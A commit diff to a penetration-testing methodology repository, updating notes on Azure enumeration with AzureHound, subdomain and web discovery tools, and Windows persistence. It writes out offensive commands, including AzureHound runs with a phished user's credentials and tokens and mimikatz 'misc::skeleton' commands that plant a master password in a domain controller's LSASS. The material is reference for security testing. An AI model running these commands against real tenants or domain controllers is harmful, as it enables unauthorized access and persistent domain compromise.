Bug Hunting Methodology Update

Methodology and Resources/Cloud - Azure Pentest.md

@@ -95,7 +95,24 @@
     ./azurehound -u "phisheduser@contoso.onmicrosoft.com" -p "Password1" list -o initial-scan.json --tenant "contoso.onmicrosoft.com"
     ./azurehound -a "6b5adee8-..." -s "<secret>" --tenant "contoso.onmicrosoft.com" list
     ./azurehound -j "ey..." --tenant "contoso.onmicrosoft.com" list az-ad
-    ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list
+    ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list users
+
+    # List of collections
+    az-ad: Collect all information available at the AzureAD tenant level. In most tenants, all users have the ability to read all this information by default.
+    az-rm: Collect all information available at the AzureRM subscription level. Users do not by default have read access to any of this information.
+
+    apps: Collects AzureAD application registration objects.
+    devices: Collects AzureAD devices regardless of join type.
+    groups: Collects AzureAD security-enabled groups, both role eligible and non role eligible.
+    key-vaults: Collects AzureRM key vaults.
+    management-groups: Collects AzureRM management group objects
+    resource-groups: Collects AzureRM resource group objects
+    roles: Collects AzureAD admin role objects
+    service-principals: Collects AzureAD service principals
+    subscriptions: Collevts AzureRM subscriptions
+    tenants: Collevts AzureAD tenant objects
+    users: Collects AzureAD users, including any guest users in the target tenant.
+    virtual-machines: Collects AzureRM virtual machines
 
     # GUI access
     bolt://localhost:7687

Methodology and Resources/Methodology and enumeration.md

@@ -47,12 +47,17 @@
 ### Network discovery
 
 * Subdomains enumeration
-  * [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com`
+  * Enumerate already found subdomains: [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com`
+  * Permutate subdomains: [infosec-au/altdns](https://github.com/infosec-au/altdns)
+  * Bruteforce subdomains: [Josue87/gotator](https://github.com/Josue87/gotator)
+  * Subdomain takeovers: [EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz)
 
 * Network discovery
   * Scan IP ranges with `nmap`, [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) and [projectdiscovery/naabu](https://github.com/projectdiscovery/naabu)
   * Discover services, version and banners
 
+* Review latest acquisitions
+
 * ASN enumeration
   * [projectdiscovery/asnmap](https://github.com/projectdiscovery/asnmap): `asnmap -a AS45596 -silent`
 
@@ -69,6 +74,11 @@
 
 ### Web discovery
 
+* Locate `robots.txt` file
+* Retrieve comments in source code
+* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls)
+* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner)
+
 * List all the subdirectories and files with `gobuster` or `ffuf`
   ```ps1
   # gobuster -w wordlist -u URL -t threads

Methodology and Resources/Windows - Persistence.md

@@ -478,8 +478,14 @@ mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt
 
 ### Skeleton Key
 
+> Inject a master password into the LSASS process of a Domain Controller.
+
+Requirements:
+* Domain Administrator (SeDebugPrivilege) or `NTAUTHORITY\SYSTEM`
+
 ```powershell
-# Exploitation Command runned as DA:
+# Execute the skeleton key attack
+mimikatz "privilege::debug" "misc::skeleton"
 Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DCs FQDN>
 
 # Access using the password "mimikatz"